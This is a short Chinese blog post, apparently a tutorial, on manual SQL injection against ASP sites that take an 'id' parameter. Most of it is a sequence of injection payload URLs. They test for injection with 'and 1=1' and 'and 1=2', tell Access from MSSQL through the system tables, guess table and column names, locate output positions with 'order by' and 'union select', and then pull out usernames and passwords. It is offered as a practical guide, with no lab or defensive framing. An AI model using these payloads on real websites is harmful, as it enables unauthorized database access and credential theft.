asp手工注入

判断是否存在注入

http://URL.asp?id=24 and 1=1 返回了正常

http://URL.asp?id=24 and 1=2 返回了错误

注入存在

判断数据库是ACC或MSS:ACCESS的系统表是msysobjects,且在WEB环境下没有访问权限,MSS的系统表是sysobjects,在WEB环境下有访问权限。

http://URL.asp?id=24 and (select count(*) from sysobjects)>0

http://URL.asp?id=24 and (select count(*) from msysobjects)>0

若数据库是MSS,则第一条,网页,一定运行正常,第二条则异常;若是ACCESS则两条都会异常。

判断表名

http://URL.asp?id=24 and (select count(*) from 表名)>0

如果表名存在就会返回正常,反则错误。

判断列名:

and (select count(列名) from 已存在表名)>0

判断网站的回显位置:

order by N

union select 1,2,3…N from 已存在表名

猜用户名和密码长度;

根据回显位置替换列名就可以了

为您推荐

发表评论

电子邮件地址不会被公开。 必填项已用*标注